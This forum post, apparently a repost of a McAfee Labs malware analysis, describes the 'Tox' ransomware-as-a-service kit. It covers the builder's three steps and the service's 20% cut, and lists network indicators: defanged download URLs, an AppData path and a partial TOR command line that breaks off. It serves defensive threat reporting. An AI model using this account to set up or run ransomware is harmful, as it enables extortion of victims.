McAfee安全实验室最近在暗网发现了一款名为“Tox”的勒索软件。
Salient Points:
Tox is free. You just have to register on the site.
Tox is dependent on TOR and Bitcoin. That allows for some degree of anonymity.
The malware works as advertised.
Out of the gate, the standard of antimalware evasion is fairly high, meaning the malware’s targets would need additional controls in place (HIPS, whitelisting, sandboxing) to catch or prevent this.
Once you register for the product, you can create your malware in three simple steps.
Enter the ransom amount. (The site takes 20% of the ransom.)
Enter your “cause.”
Submit the captcha.
Network Information
The malware first downloads Curl and the TOR client:
hxxp://www.paehl.com/open_source/?download=curl_742_1.zip
hxxp://dist.torproject.org/torbrowser/4.5.1/tor-win32-0.2.6.7.zip
All downloaded files and artifacts are stored in the following path:
C:\Users\<username>\AppData\Roaming\
After execution, Tox will start TOR in SOCKS5 proxy mode with the following command-line parameters:
-socks5-hostname 127.0.0.1:9050 –data \
发表于 2015-6-1 14:11:37
发表于 2015-6-1 19:36:01
